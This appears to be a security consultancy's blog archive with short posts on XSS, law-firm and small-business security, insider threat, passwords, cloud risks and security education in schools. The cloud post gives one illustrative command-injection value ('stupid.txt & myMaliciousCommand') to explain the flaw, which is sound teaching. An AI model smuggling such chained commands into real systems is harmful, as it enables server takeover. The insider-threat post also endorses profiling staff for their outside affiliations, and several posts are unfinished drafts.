Do you have that in XXS?

/in /by

What is XXS?

Cross Site Scripting is vulnerability that occurs when an Attacker injects codes/scripts into the client-facing side of a web application. They do this by inserting data in the application via an untrusted source using a web request. This can also be done when data is included in dynamic content sent to the user of the web application with the content being validated to ensure no malicious content is included. The main thing about XSS is that it doesn’t affect the web site, instead it uses the web site or the server as a Launchpad to trigger the malicious code to send to the site user to: steal login details, monitor user’s activities, abuse the user’s activities, steal the user’s cookie (which has session IDs and passwords).

The malicious content that is sent to the web browser normally uses some element of JAVAscript. However, this could also include HMTL, Flash content or a mixture of malicious codes that could even be more dangerous than the XSS itself. The use of XSS is very powerful because it is commonly used to capture private data such as cookie information, session information to the attacker as well as re-directing a user to a malicious site and tricking them to supply other data and possibly taking control of their machine.

Type of XSS

There are two main types of Cross Site Scripting: Stored and Reflected (and DOM Based XSS)

A stored cross site scripting exploit is one that is permanently stored on the webserver or the database (on a message forum, blog site, in comment fields on a shopping website etc. When a visitor visits the website, this website will ‘server’ the malicious code to the user. Again, this captures various personal data and all activities in the users browser.

With a Reflected Cross Site Scripting attack, the users requested are replayed in the browser back to the user. In that, if a user were to search for a word, that word would be displayed back to the user on the webpage without providing a sensible result/output. In addition, this could present an error message or all the information the user input into the web browser. This type of attacked is normally delivered to the user by an email, a text, via a malicious website, via filling in a form etc.

Risks Associated With XSS

  • Misuse of server bandwidth & resources
  • User account(username passwords) theft via cookie hijacking)
  • Keystroke logging of user activity
  • Abuse of credentials
  • Allows the attacker the ability to exploit the users browser
  • Web app defacement and potential vandalism
  • Theft of content

Top InfoSec Tips For Law Firms…

/in /by

There’s a quiet revolution taking place in the legal industry and the pace at which this is happening is gathering serious momentum. Suddenly the legal sector is having to cope and operate as a fully-fledged commercial entity and as such, the technology, processes and regulatory requirements are increasing and Lawyers do not necessarily have the time or skills in house to harness the benefits and opportunities the new era present.

With the above in mind, as a forward thinking firm, here are some of the key areas to embrace as you scale your firm to capitalise on the benefits and opportunities the 21st Century presents.

Infrastructure Security
Gone are the days when IT Managers and ‘techies’ keeps all their ‘cards’ close to their chest and treat the company’s IT infrastructure as if it’s theirs… and that they are powerful and always in control.

With the evolution of cloud services, virtual desktops, smart-devices, the changing needs of users; IT Managers are slowing watching their control and native powers diluted.  However, all is not lost because the company will always need to have the knowledge on an internal expert at hand.  But on a whole these roles are being transferred to Account Managers within hosting companies and whoever was the IT Manager in a company, are now seeing their roles as either a middle man, a Transition Manager, a Consultant or moving on to other things outside of the legal sector.

Within the infrastructure, the security for most “smart companies” are relatively good, but for the duration of which these IT Managers hold their post, things were relatively secure to a point and at that point, hacking, insider threat and data loss wasn’t a major challenge, maybe the biggest challenge at the time was the huge disconnect with IT and other parts of the business in terms of what can and cannot be bought (hardware, software, fancy gadgets) to propel the business.

Cloud Computing
Cloud security and the term cloud computing has become the buzz word/phrase in the industry nowadays but not many people really understand the concept and the implications to their business.  While it is contoured as very economical financially, sometimes not enough planning and thought process goes into the transition and as such, the true opportunities are not met and in so doing, increases the risks on top of those that were not previous in known or identified whilst inhabiting the traditional computing model.

Three key areas for consideration for Law firms when thinking of transitioning from the traditional technology services model are:

  1. Knowing your current risk profile and measure that against the perceived unknown and fit for purpose solution
  2. Know who, what, where and how your data, systems are held – within the EU, Outside the EU…
  3. Know the laws and compliance requirements of the country
  4. Perform regular or on-going audits of your systems

Application Security – Case Management System
Application security is becoming more and more of a concern to organisations due to the capabilities and ‘unknown’ freemium culture; especially those that are uncontrolled and are not necessarily proprietary.  Often times the security within applications are substandard and do don’t meet minimum security standard and if there are security, it is always a bolt on solution rather than security that is built into the SDLC.

Compliance – LEXCEL – ISO22301 – ISO27001 etc.
Never before has compliance, best practices and international standards played such a huge role in the way organisations and their data and IT management operate.  Over the past 6-10 years the increase reliance and demonstrable accountability of companies to comply with standards (competent laws, bribery act, DPA, HIPPA, SOX, PCI-DSS, ISO27001 etc.) is more and more a big business as well as well as being a challenge – practically, financially and strategically.

With the globalisation and the ease at which a small company can compete with a huge multinational, the boundaries for compliance and transparency widens and as such, various accreditations, and compliance requirements comes into the fray where, privacy, security are concerned.

Many Law Firms operate globally and as they cross borders, the burden of compliance adds to the compliance stack they need to address if they plan on expanding and dealing with their ideal multinationals clients.  Some of the international compliance requirements applicable in some of the top developed countries are as follows:

  • UK – DPA, BRIBERY ACT, FOI, ISO27001, Acquisition Law, competition Law etc.
  • Switzerland – ASIA – US

For any successful expansion in some of the above areas, your firm will need to address and ensure that you tick the box to demonstrate your compliance and that you are deserving of having a place at the international table.

Bring Your Own Device – The Smart-device Explosion
Statistics – ……..

‘Boyd oh boyd’, the headache and challenges that brought the phenomenon in the organisation under the guise of productivity, flexibility but not fit for purpose.  When the smart-device hit the workplace, most CEOs and high flyers executives were the main adapters of this new phenomenon but never really understand the implication of security, compliance and whether or not it will actually be integrated into the existing IT infrastructure.  These poses added challenges of entertaining a ‘bolt-on’ work-around approach to enable CEOs and those with influence to continue to enjoy the status quo of having these devices.

Secure File Sharing – Document Management Security
Time and time again, you see Lawyers with huge suitcases, huge lever arch folders making their way swiftly to court, struggling with highly confidential files and client details. Do you ever imagine for a moment if they were to get mugged by the accused/defendant’s ruthless accomplice, or left it on the train? The market for online sharing and collaboration is growing exponentially at a rate that the industry has never seen before and as this happens, there is great need for more security and protection of the many sensitive files that ‘floats’ across the wires every second as files sizes that are larger than ever before with the support of super fast broadband and connection speeds.

Everything is going online nowadays and only the firm that is forward thinking and serious about growth, profitability and client care will succeed and as such secure online collaboration and the use of these facilities will no doubt enhance the position and strategies of the forward thinking firms.  Even, in some courts nowadays, some Solicitors just turn up and all their casework is at the court house even before they get there ready.  These new approaches to files transfers and the use of technology is becoming more and more prevalent and the awareness of such services and the value it adds to the firm and the client on a whole is enormous but a strategic decision needs to be made not only for the secure file transfer approach but also the secure storage and indexing of scanned documents.  These must be kept secure (encrypted) and with relevant fit for purpose security and compliance controls to mitigate risks via data leakage.

Big data has become a buzzword over the past 2+ years… but who generates more data than a law firm and by extension, HIGHLY confidential data?

One of the many points to consider for Law firms are:

  • Secure data sharing facilities
  • Data archiving and document management security solution
  • Data retention policy and access control
  • And finally, last but definitely not least, the security of the enormous amount of data generated and stored by Law firms.

It’s sad to say however, that some Law firms are still on the fence with their transition to move to a robust data and IT platform; which nowadays is a key strategic factor in supporting the growth, strategy and ROI for firms.

Removable Media Security
(Pen Drives/Memory sticks, ipods, CDs)

Proactively Challenge Your Security

Vulnerability scanning / Pen Testing

On-going training and awareness of employees

eLearning, workshops etc.

 

Don’t Drop The Ball, eh, Data..!

/in /by

Infosec is about protecting your most valuable asset – your data. Evading and staying ahead of your opponent and attacker and competition all the way! Yours truly (our CEO) is doing just that securing the ball and sprinting away out of harm’s way.

Our CEO Clinton Walker plays American Football and he knows all too well, the risks that lies ahead or those that are waiting for him on his way to achieving and scoring his goal.

Implementing and practicing and managing information security and associated threats is a game… it is all made up of multiple vectors and actors just like your team in whatever capacity you view it.  It is a collaborative approach that requires great negotiation skills, professionalism and risk taking.

Like any team, everyone is playing to win.  In this case, winning is about protecting clients’ data and evading various obstacles and curve balls hackers throw at you.

So just how do you keep that golden ball/data safe?

  1. Know your asset (data)
  2. Assess the likelihood of risks that could be associated to it
  3. Ensure that you implement controls to address any risks and or potential threats to your asset
  4. Continually review and update the risk profile of this asset
  5. Ensure that this is kept secure at all times whether it is on premise or in the cloud
  6. Know your opponent
  7. Do not get fouled or get caught out with any unnecessary penalties
  8. Build your credibility through good practice, partnership and show good governance and gamesmanship
  9. Educate and continually train your team to identify, report and mitigate gaps in the field and in any processes or in the game they play
  10. Be open to new approaches and thinking in managing risks and ensure that your data is managed securely at all times

The Inside Threat

/in /by

Insider Threat…The root of all evil when temptations and unfavourable circumstances are over bearing…

Time and time again ‘the Business’ gets panic in a plethora of noise about a new or reincarnated version of malware/botnets. However, whilst we are caught up in the noise/hype, the technical acronyms and the race to get a new fix in, our esteemed internal colleagues are plotting a sly way to steel your treasure – your data.

Insider threat has always been on the radar but the political correctness of organisations tend to be a bit softer and fluffy about the trust of their employees.  On one hand it’s great to have an established view that… I trust all my employees.  However, I am a realist and we must not forget that we live in the real world where data is a strong currency and not everyone who works for you, share your vision and company ethos.

The phrase… keep your friend close and your enemy closer…’ could easily be twisted to say, keep your enemy close and your employee closely monitored’.

Time and time again you see examples of data breach in the news and we wonder why this keeps happening.  Be it deliberate or accidental.

Over the last 12-18 months, there’s been a spate of incidents with household brands such as Morrison’s, The Government and other private entities.  For Morrison’s, lightening struck twice in the same place.  It is a very telling story considering where cybersecurity was in terms of Board level visibility 5-10 years ago.  The board can no longer ignore that fact that they are live targets and it is not a matter of ‘if’, but actually, when do we find out that we have been hacked.  There was a time when most data breach was arising from the public sector and some private sector companies grin quietly as to show their level of investment and robustness.  However, what we are seeing now is a state of humbleness and quiet shuffling of the cards to make strides towards hardening and ensuring that information security is talked about and embedded throughout the organisation.

Whilst most tech savvy and Infosec enthusiast knows or at least acknowledge that cyberwar is currently about firefighting for most companies, it is equally true that some SMEs just do not have the resources, finance or apetite to even start considering defending their business.

However, there are some things that companies can do on their own with ad-hoc or consistent 3rd party support.  Here are some of the things that can be done to start building a foundation…

  • Develop a policy and share it with everyone in the business… discuss the challenges and get feedback to improve as your business evolve
  • Help employees to understand the drivers/reasons behind these policies and the importance of adhering to these
  • Use software tools as part of the strategy to compliment policies and monitor and updated data security controls as necessary.

So what’s the solution?

Whatever the solution, we will always be human and we will always find a way.  This is always going cut across the people, process and technology landscape…

People

Provide current realistic training and awareness for all employees.  The training should be tailored to team and individual roles.  We cannot over-emphasise the value of good training.  After all, most of or a great proportion of the breaches that occur are human error and are accidental.

Process

This is a very broad area and can be lead to various interpretations.  However in terms of process in this context, I am referring to:

(1) A process to access what is considered privileged data

(2) A process to proactively monitor staff activities to spot trends and spike in behaviour.  Not just random behaviours but long-term persistent activities.

(3) Staff profiling and network (external) connection to outside affiliations that could cause concern by association and the potential for blackmail, bribery etc.

Six Advantages Of Hiring An Infosec Biz to Safeguard Your Business

/in /by

A few days ago I received an online Facebook chat message from a former colleague asking for a donation for the surgery of a close friend. I eagerly volunteered to help and took a few details including where the money was to be transferred. However, on calling her I was informed that it was not her that sent the message,  but an ‘ imposter’ who had replicated her Facebook page and was contacting all the people on her list seeking a donation. Now imagine if I were a customer of yours and had received a similar message from your business Facebook page?

As businesses become more accessible to their customers, they unfortunately also become increasingly accessible to cyber criminals.

Smaller Businesses are the most vulnerable to cyber attacks

A 2013 report on information security by the U.K government confirms that cyber attacks on small businesses are up by 10%, with 87% of small businesses reporting some form of security breach in the last year. The report also highlighted that majority of these breaches were a result of staff action and that small businesses were often found lacking in user awareness, mobile device working policies, removable media controls, monitoring, network security and in their ability to respond to an incident of security threat. No wonder then smaller businesses offer the path of least resistance to attackers for gaining access to valuable customer data including credit card details, intellectual property and even money in the bank. As per an internet threat report published by Symantec in April this year, the highest growth in targeted attacks was seen in businesses with fewer than 250 employees.

Look beyond an anti-virus program to secure your business

Given these facts, it’s safe to assume that your business is unsafe and that you need to defend it against the most serious cyber threat. While email security is one aspect of safeguarding your business, unauthorized access to your business information via  laptops, desktops, wi-fi printers / router, mobile devices and other access channels such as social media and cloud based services needs to be monitored. This means that instead of relying on a member of your staff or a part- time technology personnel, you need to consider hiring the services of a professional IT support company that is capable of deploying device controls, updated firewalls and a comprehensive network web security gateway.

IT support program can offer the following benefits to your businesses:

  • Examine the business hardware for possible network intrusions
  • Educate staff on desktop policies
  • Check for outdated security definitions on systems
  • Monitor incoming and outgoing traffic to detect potential threat
  • Secure your website
  • Streamline your network structure for ease of administration and scalability

Looking ahead it is predicted that social media, cloud service providers and mobiles will increasingly become the new cyber security battleground.  This means multi-layer security software, an online user policy, installing security software on mobile devices and full risk assessment before signing up for a cloud service. Make sure your you seek adequate information on these aspects from your prospective IT support company.

 

How safe is your customer data across various cloud platforms?

/in /by

Though the ‘cloud’ has been around for a while now and have gained tremendous momentum, there are still some companies that are still hesitant of the risks whilst others are revelling and basking with the opportunities the cloud presents.

For those companies who are still at cross roads, it’s only a matter of time before they find themselves in a position where the cloud is the only option – be it private cloud or public cloud.

But what are some of the risks this opportunity brings with it?
Let’s not forget, whatever option a company uses, there will always be risks.  It’s just a matter of the size of that company’s risks appetite.

 

What are some of the controls you can harness to support the protection of data?

 

Build Platforms With Security in Mind

We use third parties who specialize in securing data because they know way more about it than we ever could. We do what we do well, and we let them focus on what they do well. We also try to design our platforms with data security in mind from the beginning. If the architecture is full of holes from the start, no amount of security is going to help.

 

Use SSL Certification, Malware Scans, VeriSign

Our website is scanned on a regular basis for malware and other security risks, and we also possess an SSL digital certificate so our customers know our webpages are safe. Our website is also SSL encrypted. Lastly, our website displays the VeriSign seal, which is another way our customers know they can use our website without risk.

 

Choose Partners Carefully

As a scrappy startup, it’s very easy to find low-cost providers of analytics or customer relationship management (CRM) software. We choose to work closely with name-brand partners. We research the security of those firms and trust them implicitly, given that a lot of the “big guys” — large companies with a lot more to lose — choose them. Invest in security from day one to ensure customer trust.

 

Plan, Then Create a Backup Plan

Take the most obvious steps in order to ensure the safety of your customers’ data — this includes ensuring all firmware/software is up-to-date, utilizing SSL certificates to encrypt important data transmission and focusing on code security to eliminate potential database and XSS vulnerabilities. Then, create a backup plan in case that fails. Store critical customer data in encrypted formats!
Eliminate Possible Security Problems With Beyond Security

Our e-commerce site accepts large credit card payments daily for big-ticket items, so we understand the importance of protecting our customers’ data. For this imperative task, we use Beyond Security (beyondsecurity.com), a service that performs daily testing on our website to eliminate the possibility of website security problems, like malware, SQL injection and cross-site scripting.

 

Password Best Practice

/in /by

Password Best Practice

Passwords are like the keys to your home/car but at work, it is the digital key to highly sensitive data. So why use a weak or simple password to access highly sensitive data?

…like our keys to your car, home and office… so is the password to our sensitive data…

Choosing a secure password is critical to maintaining security. When choosing a password your primary objective is to make it difficult for anyone trying to guess or hack your password electronically. Passwords should contain at least 8 characters as a minimum, and should include at least one numeric and special character (e.g. punctuation marks).

Top Tips for creating Strong Passwords:

  • Use upper and lowercase characters (A-Z & a-z)
  • Use digits from 0-9
  • Use special characters such to: %£$*?’@

Password Dos and Don’ts

Dos

  • Use/create a strong password – Use special characters
  • Change your password regularly (every 40 days for example)
  • Create a password with a minimum of 8 characters
  • Use different passwords for different systems, applications where a single sign-on solution is not in place
  • Use a password safe if there’s one available
  • Be careful of shoulder surfers watching your keystrokes to remember your passwords
  • Do make it random – for example, combine different themes/genre into one password – a word from a song, a poem, holiday, a movie etc.


Don’ts
Basic password practices to keep your password and access to your data secure:

  • Do not share your password with anyone…not even your manager
  • Do not use passwords or combination of characters that are easy to guess
  • Do not use your favourite pets name, animal, colour, child name, date of birth
  • Do not write it down and or stick it to your computer screen
  • Do not use ‘password’, 123456, abcdef… for your password
  • Do not use your username or login as your password
  • Do not use a word or phrase spelt backwards
  • Do not repeat your passwords by changing, or adding another number or letter at the end
  • Do not repeat any of you last series of passwords
  • Do not use dates as a means of creating your password – i.e. September2011
  • Do not use the same password for personal use for work
  • Do not substitute letters for number – for example: password changed to: p055w0rd
  • Do not use any of the examples given in this document as your password
  • Do not use standard dictionary words
  • Do not allow or tick the box or agree to any saving of your password in any forms you fill in online.


Examples of a weak password

  • A blank password field, something that is easy to guess, the name of your pet, birthdays, favourite colours etc.
  • 12345abcdef
  • Abcdef
  • Password
  • letmein

Examples of a strong password

  • A password with a minimum of 8 characters containing one or more of the following: ?%1$*)#@]£ and
  • A password containing upper and lower case and spaces

 

EXAMPLES OF PASSWORD BREACH IN THE PRESS

Facebook: http://money.cnn.com/2013/12/04/technology/security/passwords-stolen/index.html

http://grahamcluley.com/2013/11/top-50-passwords-adobe-security-breach/

eBay Password breach: http://www.bbc.co.uk/news/technology-27503290

http://www.forbes.com/sites/gregorymcneal/2014/05/26/how-to-protect-yourself-after-the-ebay-data-breach/

Very Good examples: http://www.pcworld.com/article/2089244/the-25-worst-passwords-of-2013-password-gets-dethroned.html

>>….. >> Here’s the full list of the worst passwords from 2013, according to Splashdata:

  1. 123456
  2. password
  3. 12345678
  4. qwerty
  5. abc123
  6. 123456789
  7. 111111
  8. 1234567
  9. iloveyou
  10. adobe123
  11. 123123
  12. admin
  13. 12345
  14. password1
  15. princess
  16. azerty
  17. trustno1
  18. 000000
  19. 1234567890
  20. letmein
  21. photoshop
  22. 1234
  23. monkey
  24. shadow
  25. sunshine

Any of those familiar?

Security Resilience in The Cloud

/in /by

Background

As the advancement in technology grows and the demands for new multifunction devices soar, the fast pace of cloud services soar, the complexities and features grow into an enormous compliance and security nightmare. On the other hand, it can be equally construed that the security issues that accompany these devices are a major cause for Information Security has gained momentum over the years and the pace at which the demand for assurance in Information Security is growing. In addition, it is only natural to face the challenges and tackle the issues that are imminent which posses a threat to the global corporate world of business.

The growth of hackers, numerous malicious software codes and the inevitable zero day exploitation is only getting worse. The way in which enterprises challenge and mitigate these risks is to use all the possible counter measures there are to prove their success or failure in a global dynamic IT environment.

What are the threats in a hosted cloud environment?

The threat landscape is constantly changing. However, some of the most dangerous threats are those that are ‘old school’ with a more sophisticated new approach in launching an Some of the typical threats that are pertinent to cloud services are:

Command Execution

A command string, executed in server-side code, contains invalidated user input

Potential impact

  • The attacker can execute arbitrary code using the web server privileges
  • This code could retrieve data from the server or directly alter the server

Simple example

  • Web user is supposed to provide a filename to be displayed or retrieved
  • The web server uses “echo” or “copy” directly on filename, as provided
  • An attack provides a filename “stupid.txt & myMaliciousCommand”

Session Hijacking

This is sometimes also known as cookie hijacking. This is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorised access to information or services in a computer system. This type of attack happens when the Security malicious user guesses or steals the authentic token or token key for that session and by doing so, accesses the webserver system or resources as a legitimate user. This can lead to further security breaches via carrying a man-in-the-middle attack, browser attacks or even installation of malicious codes onto system.

Compliance and legislation

The challenge of legislation and compliance in the cloud is a slow adoption. Only a few internal businesses tend to be able to comply and manage to satisfy compliance in an interconnected cloud environment. Compliance requirements such as SOX, HIPPA, Safe Habour agreement are some of the main cross-country challenges businesses have to battle with to provide assurance and security. One of the biggest problems with the increased use of cloud services is that the client cannot, with confidence, control where their data is stored, who is processing or harvesting their data; and that in itself is a security challenge.

Especially where the services offered by the cloud services provider is free, the client will not have any say/control over the location their data is being stored, backed up and managed.

Compromise of Interconnected Systems

Resulting from exploitation of a trusted path through an insecure application or networkresource, resulting in the compromise of partner systems and their data; in turn leading to a loss of reputation and customer confidence. Clinton at Security Aware calls it ‘Cross contamination exploits’ – this is an exploit that has been coined in a way such that it compromises all the systems hosted in a shared environment.

Denial of Service

Resulting in the unavailability of network and application resources, potentially leading to the loss of revenue.

What are some of the vulnerabilities?

These key threats are most often realised through the following vulnerabilities within the internal network:

  • Unused open ports and services
  • Missing security patches/updates
  • Poor design, configuration and implementation of services
  • Default/generic user accounts (username & passwords)
  • Lack of understanding of best practices and security requirements
  • Lack of or poor internal monitoring and auditing of systems
  • Excessive privileges assigned to users within an unrestricted environment

When should you perform security assessment of your cloud system?

With new vulnerabilities and malware exploits populating the web daily, it is best practice to develop a robust vulnerability management strategy to manage the threats your business faces continuously. Assessment should be done on a regular basis to have constant visibility of the threats your business faces. Some companies have systems in place to identify and manage vulnerabilities on a weekly, fortnightly or monthly basis. In some cases, bigger companies with an allocated budget and resources normally perform security assessments on a daily basis.

In addition, it is critical to perform an assessment of corporate networks and their services both prior to their initial roll out and on a regular basis to ensure that any and all specific security threats are understood, managed and remediated.

Ten top cyber security tips for small business

/in /by

SMEs and start-ups are some of the most profitable and fastest growing companies with a flare for innovation, passion and a surplus amount of energy. However, due to the very nature of these individuals (hunters) they do not really see the need to slow down and assess the things that helps them fine-tune and streamline the structure of their business; unless they are lucky enough to have the backing and support of a venture capital (VC) firm.

The security and compliance are the last things on their mind…their aim is to succeed and push the barriers of opportunity and as such sometimes need ‘bolt-on’ support to piece all the scattered piece of puzzles together. Especially if they reach a point where they decides to sell or move into new markets; markets that requires them to demonstrate and operate in a defined manner.

So, for all the buzzing enthusiastic entrepreneur out there, try and get it right as go you along and don’t just ignore the little things that could potentially boost your position in winning the next deal.

Here are some tips to bear in mind prior to starting your journey as an entrepreneur and during your journey to achieve your entrepreneurial aspirations:

 

  • Understand the market you are targeting and ensure that you address all the possible standard requirements they would need even before engaging you
  • Make sure you understand your obligation around preserving the confidentiality, integrity and holistic security of their data
  • Develop a security policy
  • Develop and implement an acceptable usage policy internally if you have other employees
  • Always ensure you utilise at a minimum, a non-disclosure agreement and have at least a client engagement letter to solidify your business relations with clients
  • Carry out regular security scanning/assessment of your website/systems/applications if you are an ecommerce business or predominantly operating online
  • If you are an ecommerce business, be sure to think about doing the minimum – a PCI-DSS self-assessment questionnaire. You need to show that you take client data security and the security of your business seriously
  • Ensure you register with your data protection and privacy Agency, (in the UK, register with the ICO)
  • Develop and implement a mobile device usage strategy and policy
  • If you have a lot of uncontrolled devices or your employees uses their own devices, there are more reason to focus on the security and compliance of these devices regardless of who owns the device – at the end of the day, whatever data is being pushed to these devices, you as a company is responsible for how it’s used and processed
  • Develop and implement a social media policy to help your business utilise these mediums to maximise the full benefits to be had from social media
  • Start to seriously thinking about or purchasing a cybersecurity insurance policy to help you cover for any breach in relation to cybersecurity hacks/breach
  • Take every opportunity to educate yourself and your employees on a regular basis on the changes in legislation that may impact the way you operate your business (EU Directives, Safe harbour agreement, Data protection Act, FOI, Bribery Act) as well as how to deal with potential security scams and suspected breach
  • Some people may say this is not relevant because their company is too small to be doing some of these but a key thing to have in place is a business continuity plan…what if you were to fall ill, your business is flooded, caught fire, civil unrest etc., would you still be capable of providing the same levels of service to your clients?
  • Have a clear easy to understand incident response plan
  • Encrypt every piece of data you deem important to the running of your business
  • Perform a risk assessment on your business (at least the critical areas)

Infosec In Schools – Is This Too Much To Ask For…?

/in /by

According to the Information Commissioner’s Office (ICO), Data breaches in the UK have increased tenfold in the past five years. In local government the increase was 1,609% and within the NHS 935%.

With the current potential fine of up to £500,000, for data breach’s and breach of data that is not adequately protected, Schools are not immune to such fines but, at the rate at which cybercriminals are compromising systems with bias to industry or organisation and the lack of robust security in some schools, it will not be long before the ICO will be issuing fines to Schools for data breach’s.

In the education sector, firm figures are not yet available. However, Schools, FE & HE institutions are arguably some of the institutions that have been somewhat left behind in the trends of picking up the mantle for Information Security. Unless they are a ‘flashy’ academy, a high profile university with lots of money, or one of those schools that falls into the category of building schools for the future, essential security programmes and best practices are hardly something that is on the radar of their internal infrastructure. The situation gets worse further downstream, where not a lot of schools actively deliver up to date relevant cybersecurity or cyberbullying workshops and or educational awareness seminars to fulfill there e-safety responsibilities.

The pace of technology is moving so fast to the extent that the programs currently delivered in schools are dated and require a total overhaul for most part. For this to happen, a shift in every aspect of the schools’ culture and the education system needs to take place from strategy, curriculum, to teachers, infrastructure, to pupils’, staff, parents, guardians and careers.

The Facts

More and more there is a significant focus on education institutions, simply because they are seen as easy targets for cybercriminals. Over the past few years there’s been a spike in the frequency and amount of security breaches in the education sector that can be argued to be utter carelessness. One such example is that of the ‘big bang’ of the conficker virus that slammed a lot of educational institutions and compromised a lot of confidential systems, data, emails and took control of critical infrastructure assets. The impact was so harsh that Internet Service Providers and various other organisations blacklisted some institutions and various domains.

Some of the most recent reports of data security breaches in Schools are as follows:

Like many businesses, the default security culture that is expected is a painstaking taste to acquire and the majority of businesses nowadays are playing catch-up with everything in the technology arena unless they are at the cutting edge of forward thinking innovations and being pacesetters.

The Current Situation In the Education Sector

The current situation and the way in which the powers that be fund, support and drive curriculum programmes have much more to be desired. With the lack of, or shortage of ICT teachers and experienced ICT members of staff in some schools, this leaves schools more vulnerable to cyber-attacks and even if schools are subscribed to their Local Authorities for infrastructure services, there are still a massive amount of deficiencies in various areas to say the least, in terms of holistic security and compliance and keeping up with the pace of mainstream technology.

Why Pupils & Institutions Data Needs Protecting?

  • Protected children & vulnerable children need their privacy protecting
  • The school has a responsibility for safeguarding children whilst they are in their care on campus
  • Test results, exams and pupils records can lead to serious implications if their sensitive information were to fall into the wrong hands such as a pedophile, cybercriminals and people with malicious intent

There’s Still Hope…

The Ofsted e-safety framework is a great start to standardise and set the foundation for best practices and governance in schools in a holistic manner.

The framework covers key areas such as:

  • All teaching and non-teaching staff should be aware and be able to recognise e-safety issues with high-quality leadership and management to make e-safety a priority
  • High priority given to training and continuation training to all staff, including the contribution of the wider school community. One member of staff to receive accredited training (for example: to become an e-safety officer)
  • Clear reporting processes
  • Rigorous, plain English policies and procedures integrated with other relevant policies
  • Progressive e-safety curriculum
  • Provision of a recognised Internet Service Provider (ISP) with age-related filtering
  • Good risk assessment

The Challenges

Some of the key challenges that hinder the growth and seriousness of this area as a profession are:

  • It’s attractiveness to the younger audience who will make up the future workforce
  • The industry does not have a standardised career path similar to well established professions such as finance, medical, Nursing etc.
  • There is not enough awareness in schools and even with the general public on the opportunities and rewards in an information Security/Cybersecurity career
  • The lack of teachers & Career Advisers with the right skills, and knowledge and depth of experience – most of these advisers are somewhat backward in terms of technology experience and are predominantly focused on traditional mainstream career paths

 

If the education sector is to thrive and become more vigilant and as high-tech as some of the wealthy academies, there needs to be a radical shift in culture and the way in which the traditional curriculum is structured and run.

What Needs To Be Addressed At School Level?

Some of the things that need to be addressed to enable schools, the labour force and the country on a whole, to sustain and defend against the growing cyber threat that could compromise key National Infrastructure systems are:

  • Greater support from government, education bodies and independent agencies to ensure that the right resources are allocated to the areas that need it most and those areas that will promote a cultural change and a fresh approach to looking to the future of cybersecurity and how to mitigate risks
  • Recruit and or train educators of the future and encourage existing industry professionals to work in the education sector
  • Train a new generation of career advisers and make sure that Information Security is seen as an attractive profession with similar and more rewarding remuneration as similar professions and other career paths
  • Regular campaigns and awareness workshops need to be part of the ethos and strategy to build a stronger platform and framework for the new generation of security professionals
  • More cyberbullying workshops, competitions and activities around security privacy and best practices needs to be undertaken to continuously reinforce the message and long term objectives of establishing Information Security as a professional to aspire to
  • Career open days need to be carried out across the country to raise nationwide awareness to highlight the importance of Information Security and cybersecurity to country and schools

 

At the moment, there are no prescribed pathways for a younger person or an adult looking to get into or switch career paths to follow. Some or if not most of the seasoned security professionals in large organisations nowadays are people who just fell into Information Security because they were the most technical person at the time in an organisation or they independently saw the need and a gap at the time and so their career evolved from there onwards.

Like many other career pathways that have a definitive route into a sector, the IT sector on a whole is one of the most disjointed and there are many unorthodox routes into various roles in Information Technology.

As an example, a typical route into the field of Information Security to become a Chief Information Security Officer (CISO) could possibly look like the below:

  1. Aspiration or career change
  2. Gain applicable experience (through a series of various roles including but not limited to: Security Analyst, Security Auditor, Malware Analyst, Systems Security Administrator, Network Specialist, IT Manager/team lead…)
  3. Gain a degree (or non-degree qualification) or gain private training which are non-curricular related
  4. Qualification is one or many of the following: CISM, CISSP, CISA

 

Some of the most common job tittles/roles in the field of Information Security are:

  • Chief Information Security Officer (CISO)
  • Security Analyst
  • Security Consultant
  • Privacy Analyst/Consultant
  • Security Architect
  • Technical Security Architect
  • Security and Compliance Officer
  • Security Manager
  • Vulnerability Manager
  • Ethical Hacker

 

Some of the various qualifications one needs to possess to work in the field are as follows:

  • CISSP – Certified Information Systems Professionals
  • MSc. Masters in Information Security
  • BSc/BS – Bachelors of Science in Information Security
  • ISO27001 Lead Auditor
  • CISA – Certified Information Systems Auditor
  • CISM – Certified Information Security Manager
  • CSO – Chief Security Officer
  • Many years of hands-on experience directly in the field*

The government recently launched a CyberSecurity Apprenticeship Scheme [ http://www.bbc.co.uk/news/uk-19987761 ] that is aimed at attracting apprentices in the area of Security to create a pool of future professionals to help protect the interest of the country and help with the Country’s cybersecurity strategy. Suffice to say, enough hasn’t been done to ‘chip’ the iceberg and it will take a combination of efforts, partners and equal aspirations of the eligible workforce to really move things forward in this area.

As a country with such a strong reputation for the education system we possess, we are positioned in a unique place to lead by example and embed a strong security culture in schools and education institutions to help combat the ever growing threat of cybercrime against our nation. The sooner efforts to build cybersecurity as a mandatory course in schools, the sooner the better we will be in nurturing an educated, committed and skilled workforce to fill the gaps in this area. Never before has there been such a push for more skilled security professionals to fill the skills gap to protect national infrastructure and intellectual property of the state, business and individuals.

Practical Steps And Suggestions

So, how can the government and the business community help make this happen?

  1. Empower senior educators and institutions with the free-will and support they need to make the right decisions and to be accountable for the outcome of such initiatives
  2. Embed the need for excellence, result-driven measurement in performance objectives and KPI of education institutions
  3. Embed security culture in the core of the education system – i.e – from kindergarten, primary schools, secondary schools through to FE and HE institutions
  4. Develop extra curricular programmes and activities inside and outside the educational environment to keep the momentum and enthusiasm flowing
  5. Make the profession attractive to all gender and other age-old professions
  6. Incentivise and make sure the profession is seen as viable profession worthwhile pursuing as any other career
  7. Develop a framework or code of conduct and association that harmonise all the disjointed packets of the profession – by doing so, this ensure that misconduct and malpractices and carelessness is dealt with in similar ways as those working in the legal, financial and medical arena
  8. Develop and implement legislations and supplementary framework to support and add credibility to the profession to ensure it is taken seriously
  9. Embrace change and adapt to the changing cyber-world around us

This list and recommendations could go on and on but nothing happens without the commitment of all stakeholders involved and senior management buy-in and support. The approach that is needed is a collaborative approach that also requires direct input in the form of a top-down approach where necessary.